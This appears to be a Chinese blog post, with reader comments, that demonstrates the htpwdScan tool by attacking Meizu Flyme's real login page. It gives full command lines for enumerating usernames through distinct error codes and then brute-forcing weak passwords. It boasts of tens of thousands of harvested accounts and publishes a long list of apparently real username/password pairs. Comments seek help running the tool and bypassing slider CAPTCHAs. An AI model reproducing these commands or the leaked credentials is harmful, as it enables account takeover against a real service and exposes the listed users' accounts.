这里以魅族Flyme的账号破解为例,介绍htpwdScan的使用。页面地址 https://member.meizu.com/login.jsp
输入一个不存在的用户名,返回Error 11,而密码错误返回Error 14。(在浏览器查看源代码)
因为脚本会自动替换\r \n \t等空白字符串,所以先debug查看返回的响应文本,来选择一个关键字:
执行:
htpwdScan.py -f=meizu.txt -d uname=pinyin2.txt pwd=password.txt -debug
在响应文本中复制value=”11″作为特征串,请注意,在cmd中输入这个串,双引号需要转义。执行测试,看能否根据此关键字进行破解:
htpwdScan.py -f=meizu.txt -d uname=pinyin2.txt pwd=password.txt -err=value=\”11\” -debug
好了,确定没有出现破解成功的提示,说明关键词是能用的。
下面开始猜用户名,在pssword.txt中只列一个密码123456,在flyme.txt中写入{uname},意思是用uname元素的值来替换,这些都是固定的项,但是我们仍旧需要通过字典导入,跟其他表单元素没有区别:
htpwdScan.py -f=meizu.txt -https -d uname=pinyin2.txt pwd=password.txt flyme=flyme.txt -err=value=\”11\” -o=meizu_users.txt
双拼有16万个用户名,稍等一会儿即可全部破解完成,经过文本过滤,得到67636个用户名: meizu_users_new
好了,下面开始拿这6万多个用户名开始暴力破解,只破解几个弱口令:
123456 12345678 1233456789 666666 888888 654321 5201314 12360 qwe123 qwer1234 qazwsx
执行:
htpwdScan.py -f=meizu.txt -https -d uname=meizu_users_new.txt pwd=password.txt flyme=flyme.txt -err=value=\”14\” -o=cracked_flyme.txt
只扫描123456,就可以找到一些账号。
博文写到这里,刚发现魅族对请求实施IP限制了。不过哥前几天暴力破解成功很多123456,总是不能抵赖的。魅族泄露通讯录、短信、定位信息,也确实存在呐! 贴几个123456证明吧。不得不说,连我都觉得自己写的脚本很难用,唉。。。
ayong 123456
aibao 123456
aiga 123456
aijue 123456
anming 123456
ansheng 123456
angle 123456
aofa 123456
baogang 123456
beixi 123456
biri 123456
biman 123456
boge 123456
bohong 123456
buai 123456
buding 123456
caisai 123456
caolu 123456
cengzai 123456
cengyong 123456
cengte 123456
changdong 123456
chengeng 123456
chenju 123456
chenshu 123456
chenzhen 123456
chengqi 123456
chengxu 123456
chitao 123456
chonger 123456
chuncheng 123456
chungai 123456
congnan 123456
cuili 123456
cuixiao 123456
cunruan 123456
cunnen 123456
cuoai 123456
daben 123456
dajiang 123456
dama 123456
dazan 123456
dehong 123456
deijia 123456
dengbin 123456
dengqiang 123456
ditou 123456
dongkai 123456
dongxin 123456
dongsan 123456
doushi 123456
dulei 123456
duwu 123456
fate 123456
fanhao 123456
feiling 123456
feisi 123456
feitie 123456
feitan 123456
fendi 123456
fengfang 123456
fenggu 123456
fengling 123456
fengqin 123456
fengtong 123456
fuzen 123456
gantong 123456
gangyang 123456
gaoqin 123456
gaorong 123456
gaoshan 123456
gejie 123456
gezi 123456
gengen 123456
gentao 123456
genyue 123456
gengen 123456
gongwu 123456
guang 123456
guca 123456
gouzhua 123456
gudie 123456
gucheng 123456
gurui 123456
guanfei 123456
guanyu 123456
guangcui 123456
guangbao 123456
guangjin 123456
guangting 123456
guijin 123456
guoyuan 123456
guozao 123456
guozhuang 123456
haiou 123456
haiwei 123456
haixia 123456
hankun 123456
hanxue 123456
haobing 123456
haodao 123456
haojian 123456
hengtian 123456
honghai 123456
hongkong 123456
hongkun 123456
hongxing 123456
hongyang 123456
houjie 123456
huage 123456
huye 123456
huanxing 123456
huangdi 123456
huangshun 123456
huangyun 123456
huiluan 123456
jige 123456
jixin 123456
jiabin 123456
jiage 123456
jianlin 123456
jianxian 123456
jiangyan 123456
jiebao 123456
jiexiao 123456
jinbing 123456
jinjun 123456
jinyue 123456
jingfeng 123456
jingfan 123456
jiongde 123456
jiuer 123456
jukui 123456
junzhang 123456
kana 123456
kana 123456
kongcheng 123456
牛逼。。。。。我马上去改密码
是呐,还是设置个稍微复杂点的密码号。
博主好,我正在学习您的htpwdScan,有些问题不是很明白,不知道能否解答一下。1.能否详细解释一下-f 这个参数的获取方法2.我用htpwdScan.py -f=post.txt -database UserName,Password=vip.qq.txt -regex=”(S+)s+(S+)” -err=”用户或密码输入不正确” -fip 这条命令测试网站,但是所得出的正确结果却都是错误的,请问大概有什么原因?3.请问在哪里可以看到更多的教程资料?谢谢有一样喜欢htpwdScan的朋友可以加我,大家一起交流。Q:1.0.7.7.5.0.5.2.0.8
晚上继续磨石头过河 发现htpwdscan得出的结果居然是错的… 语句为htpwdScan.py -f=post.txt -d username=phone.txt password=password.txt -o suc.txt -err=”账号或密码错误” -suc=”跳转中请稍候” -fip 请指点我哪里弄错了 谢谢
刚刚我试了一个账号,果然进去了。。。。魅族啊,这么频繁登录,难道连个验证码也不弹吗?
杰杰,你现在在北京?加我Q1。9。2。3。2。8。。1。7
请问你是?
lidu的你认识,加了说
为什么说难用?
还没写好呢,稍后有空了再优化下。 我自己用其实还是挺顺手的。。。 不过才拿到别人可能觉得不那么方便
py”, line 315, in parse_request args.path = first_line.split(‘ ‘) IndexError: list index out of range显示这个,下不去了,是什么原因呢
Traceback (most recent call last): File “C:Documents and SettingsAdministrator桌面htpwdScan-masterhtpwdScan.py”, line 360, in parse_request() File “C:Documents and SettingsAdministrator桌面htpwdScan-masterhtpwdScan.py”, line 315, in parse_request args.path = first_line.split(‘ ‘) IndexError: list index out of range
我没详细看315行,看样子是你保存的HTTP请求有误。 GET / HTTP/1.1,第一行是GET或POST,检查下看看
哥们,看你头像,以前的“冰河洗剑”是你吗?
不是的。
在pssword.txt中只列一个密码123456,在flyme.txt中写入{uname},意思是用uname元素的值来替换,这些都是固定的项,但是我们仍旧需要通过字典导入,跟其他表单元素没有区别.前辈您好,我对安全很感兴趣,在wooyun上看到您,关注您的博客也不是很久,但确实很喜欢。 干才看到这篇文章中 “在flyme.txt中写入{uname},意思是用uname元素的值来替换” 这块我不太懂,您能稍微解释一下吗
-f=meizu.txt,请教这个meizu.txt是如何生成的呢?
post抓包
请问 -f post抓包文件要求什么格式的? 直接用-u 会自动提取参数吗?
takelogin.php post方式的
input type=”text” size=”40″ id=”username” name=”username”
input type=”password” size=”40″ id=”password” name=”password”
input type=”submit” value=”login !”
这个要什么格式的post文件才行? 直接-u 都是错误的啊
博主好,我正在学习您的htpwdScan,有些问题不是很明白,不知道能否解答一下。1.能否详细解释一下-f 这个参数的获取方法2.我用htpwdScan.py -f=post.txt -database UserName,Password=vip.qq.txt -regex=”(S+)s+(S+)” -err=”用户或密码输入不正确” -fip 这条命令测试网站,但是所得出的正确结果却都是错误的,请问大概有什么原因?3.请问在哪里可以看到更多的教程资料?谢谢晚上继续磨石头过河 发现htpwdscan得出的结果居然是错的… 语句为htpwdScan.py -f=post.txt -d username=phone.txt password=password.txt -o suc.txt -err=”账号或密码错误” -suc=”跳转中请稍候” -fip 请指点我哪里弄错了 谢谢
求告知suc=“ ”和err=“ ”后方数值的具体获得方法
现在好多厂商都选择了滑动验证,这个怎么绕过或者破解啊?
请问htpwdScan 的HTTP Basic认证功能可以导出正确的账号密码吗?怎么只有显示破解成功或者失败,无法显示哪个是正确的?-o的语句也导不出来。
请问 -f post抓包文件要求什么格式的? 直接用-u 会自动提取参数吗?
takelogin.php post方式的
tr>Username
Password
这个要什么格式的post文件才行? 直接-u 都是错误的啊
以魅族Flyme的账号破解为例,介绍htpwdScan的使用
这个代码怎么在浏览器中运行?
python3.6不能用啊。